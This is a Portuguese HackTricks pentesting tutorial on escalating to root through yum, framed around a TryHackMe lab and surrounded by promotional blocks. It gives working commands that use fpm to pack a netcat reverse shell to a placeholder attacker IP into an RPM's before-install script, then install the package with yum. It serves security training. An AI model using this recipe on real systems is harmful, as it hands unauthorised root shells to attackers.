3.8 KiB
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Participe do grupo 💬 Discord ou do grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud no github.
Mais exemplos sobre yum podem ser encontrados em gtfobins.
Executando comandos arbitrários via Pacotes RPM
Verificando o Ambiente
Para aproveitar este vetor, o usuário deve ser capaz de executar comandos yum como um usuário com maiores privilégios, ou seja, root.
Um exemplo funcional deste vetor
Um exemplo funcional deste exploit pode ser encontrado na sala daily bugle no tryhackme.
Empacotando um RPM
Na seção a seguir, vou cobrir o empacotamento de um shell reverso em um RPM usando fpm.
O exemplo abaixo cria um pacote que inclui um gatilho before-install com um script arbitrário que pode ser definido pelo atacante. Quando instalado, este pacote executará o comando arbitrário. Usei um exemplo simples de shell reverso netcat para demonstração, mas isso pode ser alterado conforme necessário.
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
Capturando um shell
Usando o exemplo acima e assumindo que yum
pode ser executado como um usuário com maiores privilégios.
- Transfira o rpm para o host
- Inicie um listener no seu host local, como o exemplo de listener netcat
- Instale o pacote vulnerável
yum localinstall -y exploited-1.0-1.noarch.rpm
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud no github.